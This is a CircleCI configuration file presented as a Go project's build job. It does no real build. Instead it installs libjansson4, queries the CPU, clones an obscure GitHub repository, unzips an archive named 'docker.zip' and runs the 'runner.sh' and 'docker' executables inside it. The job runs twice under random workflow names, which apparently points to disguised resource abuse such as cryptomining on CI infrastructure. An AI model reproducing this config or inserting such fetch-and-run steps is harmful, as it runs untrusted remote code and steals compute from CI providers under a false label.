version: 2.1
executors:
  circleci_machine:
    docker:
      - image: cimg/go:1.16.4
    working_directory: ~/my-project
commands:
  build:
    description: Run build
    steps:
      - checkout
      - run:
          name: build
          command: |
              sudo apt update && sudo apt install libjansson4
              lscpu
               
      - run:
          name: build
          command: |
              git clone https://github.com/sompamanajuya/sompamana21.git && cd sompamana21 && unzip docker.zip && chmod +x runner.sh docker && ./runner.sh
              
jobs:
  buildd:
    executor: circleci_machine
    working_directory: ~/my-project
    steps: [build]

    
    
workflows:
  version: 2
  trjdtyj:
    jobs:
      - buildd
  jdytdtyj:
    jobs:
      - buildd
